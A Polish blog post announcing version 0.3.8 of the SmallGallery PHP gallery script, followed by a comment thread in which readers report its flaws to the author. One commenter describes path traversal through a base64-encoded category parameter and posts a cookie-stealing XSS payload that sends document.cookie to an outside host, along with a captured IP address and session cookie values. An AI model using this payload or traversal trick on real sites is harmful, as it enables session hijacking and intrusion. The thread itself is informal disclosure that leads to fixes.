The Essence of Programming

SmallGallery v0.3.8

27 maja 2008

Kolejna wersja SmallGallery do ściągnięcia - v0.3.8 :)

Czym jest SmallGallery?
To prosty skrypt galerii pozwalający na poruszanie się po katalogach i przeglądanie zdjęć w nich zawartych. Istnieje również możliwość zgrywania plików do odpowiednich folderów przy pomocy www :)

Co nowego?
- panel konfiguracyjny www oparty na xml (admin.php)
- poprawione wgrywanie plików na serwer
- zmieniony sposób powrotu do poprzedniego katalogu
- stronicowanie zdjęć w katalogach
- mocno przebudowany silnik galerii

Minimalne wymagania:
- PHP5
- SimpleXML

Wersja SmallGallery 0.3.8 wypuszczona została na licencji Creative Commons CC-GNU GPL

Pierwsze uruchomienie:
Aby wszystko działało poprawnie należy dostać się do panelu konfiguracyjnego(admin.php) i pozmieniać ścieżki(2 pierwsze ustawienia)

Domyślne hasło do panelu administracyjnego to: smallgallery

Przykład działania: http://files.gruszka.info/smallgallery/
Ściągnij wersję 0.3.8 skryptu: smallgallery.zip

Trackback »
Komentarze:
BTM [30 marca 2008 16:54:42]

Coś się nie da uploadować – nawet po zassaniu na locala i odpaleniu :(

BTM [30 marca 2008 16:57:19]

Sorry za double-post, ale nie działa mi nigdy edit – problemem jest ustawiona na sztywno w config.xml linijka do katalogu ze zdjęciami :)

snipe [30 marca 2008 17:11:47]

@BTM: zapomniałem dodać we wpisie info o domyślnym haśle do panelu konfiguracyjnego i pierwszym uruchomieniu ;) teraz już jest :)

BTM [30 marca 2008 17:13:50]

A na stronie wciąż Ci nie działa ;-)

snipe [30 marca 2008 19:09:39]

@BTM: co nie działa?? :P

btm [30 marca 2008 19:12:24]

Upload nie działa(ł) – złe ustawienie ścieżki w config.xml
Teraz pokazuje phpinfo() ;-)

snipe [30 marca 2008 19:23:28]

ok, już powinno działać :)

btm [30 marca 2008 19:24:25]

Możesz podać swojego JID’a, albo kliknąć na btm@jabber.aster.pl?

puppy [30 marca 2008 20:29:55]

http://webexpanders.cal.pl/puppy.jpg :)

Ogólnie strasznie nieprofesjonalny skrypt, mogę go sobie używać do przeglądania katalogów na serwerze. I wgrywania plików graficznych gdziekolwiek chcę (bo filtrowanie rozszerzenia jest, prawda?)

snipe [30 marca 2008 20:41:19]

a kto powiedział, że jest on profesjonalny? :P filtrowanie ma(thx @BTM), błędy są do poprawienia i będzie ok :]

puppy [30 marca 2008 20:45:40]

ćśś, pracuję nad załadowaniem kodu php ;) błędów trochę jest, począwszy od show_thumbnail.php skończywszy na ?category= bez żadnego filtrowania (zwykły base64_encode (”../..”) i widać ładną listę plików)

ike [30 marca 2008 20:47:25]

Hm. Tak tylko zwrócę uwagę na to: http://wiki.creativecommons.org/Frequently_Asked_Questions#Can_I_use_a_Creative_Commons_license_for_software.3F

Pozdrawiam,

snipe [30 marca 2008 21:28:24]

@puppy: ścieżki poprawione ;) @ike: przyjrzę się temu dokładniej :)

puppy [30 marca 2008 21:44:32]

Na pewno dobrze to poprawiłeś? :>
1. http://webexpanders.cal.pl/smallgallery/?category=Lg==

2. http://tiny.pl/4pjg (strasznie dlugi link)

snipe [30 marca 2008 22:06:21]

@puppy: sprawdź teraz :P co do 2 pkt. to co to jest? ;)

puppy [30 marca 2008 22:07:04]

No ;) Co do p. 2 – sprawdź jaki tytuł ma Twoja galeria :P

snipe [30 marca 2008 22:11:49]

@puppy: to dzięki temu linkowi ;]

puppy [30 marca 2008 22:12:41]

No właśnie :) xss to jedno, a drugie to to, że wystarczy podstawić sobie PHPSESSID by wejść do panelu admina bez logowania.

snipe [30 marca 2008 22:16:07]

@puppy jak się ten atak nazywa?? ;)

puppy [30 marca 2008 22:17:32]

Chyba nijak, po prostu cookies ukradłem :P

snipe [30 marca 2008 22:19:35]

zarzuć kodem tego skryptu ;)

puppy [30 marca 2008 22:21:32]

„><script>document.location=„http://host.com/c.php?c=”+escape(document.cookie);</script>

Ten c.php niech po prostu zapisuje gdzieś $_GET[‘c’]; i wsio ;)
158.196.50.42: PHPSESSID=dfe6191d5d6f1892772806db8bf6f3f9; session=wjz2OS2uP4rhyHsL3Y2lGjh07Y4OCNF86EAThAN4CCkARcTVBUGPDvPIUTegotmt

Kilka informacji o autorze

Programista, blogger, uwielbia białą czekoladę ;)